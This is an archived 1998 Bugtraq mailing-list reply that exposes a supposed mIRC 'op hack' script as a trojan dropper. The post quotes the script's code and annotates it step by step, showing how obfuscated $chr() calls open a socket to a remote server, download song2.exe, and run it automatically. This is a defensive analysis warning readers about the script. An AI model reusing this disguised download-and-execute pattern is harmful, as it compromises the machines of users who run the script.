Bugtraq mailing list archives
Re: your mail
From: cacaio () DEATHKNIGHTS COM (Cacaio Torquato)
Date: Sat, 14 Nov 1998 19:37:29 -0200
At 14:50 13/11/98 -0500, root () BRAMPTON1 NETMATRIX NET wrote:
Hi, while debugging/hexing/disassembling mirc my friend slotmech last week found a mirc bug which allows to force users to send MODE commands to the server. this example script sends a MODE +o to the irc server. the mirc author has
been
notified of this but we didn't receive a response... my exploit+protection
scri$is included. Expect more mirc stuff from us.
Are you nutz man? Your code simple makes whoever wants to get op get a file in your server and execute it. I'm glad you weren't smart enough to place the full address of your server. For the ones who wants to know exactly what's happening, I will explain step by step the code. Your attempt to install your file in everyone that want to hack ops was funny, just funny...
alias hackop { ... checklen $1 ... }
call the function checklen - see below
alias checklen { .if (%xcomplete == 1) halt .if (%xinprog == 1) halt .set %xfilename song2.exe .set %xlof $lof(%xfilename) .set %xfirst 1 .write -c %xfilename
sets the filename to song2.exe, and clear it if something is on it already.
; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104
101 - 1$ .sockclose protx if this line is uncommented, it displays in the screen the following message: d o n t - s p o i l - t h e
.sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+
$chr$} opens a sock connection with the server designed. the one placed in his hode is www.g (i think he forgot the rest)
on 1:sockopen:protx: { .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+
$chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx
}
when this sock connection is oppened, he send the request 'GET /Belta/9' to the server and start receiving data
on 1:sockread:protx: { .sockread &test .set %xlof $lof(%xfilename) .if (%xfirst == 1) set %xlof 0 .set %xfirst 0 .bwrite %xfilename %xlof $sockbr &test }
just receive the data and make it a file
on 1:connect:checklen
why is it here? because when the user connects to the irc server, the script will grab the file again, and again and again.
on 1:sockclose:protx: { .sockread &test if ($sockbr > 0) { .set %xlof $lof(%xfilename) .bwrite %xfilename %xlof $sockbr &test }
finish writting file
.if ($lof(%xfilename) == 178306) { .run %xfilename .set %xcomplete 1 }
if the site of the file, in bytes, is equal to 178306, runs the file
if ($lof(%xfilename) != 178306) { .timer 1 300 checklen }
if the site of the file, in bytes, is minor to 178306, starts a timer that in 300 seconds will get the file again
} unset %xinprog unset %xfilename unset %xlof unset %xfirst }
unset the garbage variables ----------- that's it Best regards, -- Cacaio Torquato http://www.deathknights.com/cacaio The Death Knights http://www.deathknights.com zelur xuniL () -O) Tedio INC. http://www.tedio.org Think Blue. /\ /\\ _\_V +-------------------------------------------------------+ | BrasNet IRC Servers Network - Brazil | | irc.brasnet.org irc.webtech.com.br | | irc.sol.com.br | +-------------------------------------------------------+
Current thread:
- Re: Old IRC Client bug Re-Applied knarph () LINUX SAVANT-CORP COM (Nov 13)
- <Possible follow-ups>
- Re: Old IRC Client bug Re-Applied System Administrator (Nov 13)
- Re: your mail Cacaio Torquato (Nov 14)
- Re: your mail Casper Dik (Nov 14)
- Re: Old IRC Client bug Re-Applied Security Admin (Nov 18)
- Re: Old IRC Client bug Re-Applied IRCop (Nov 20)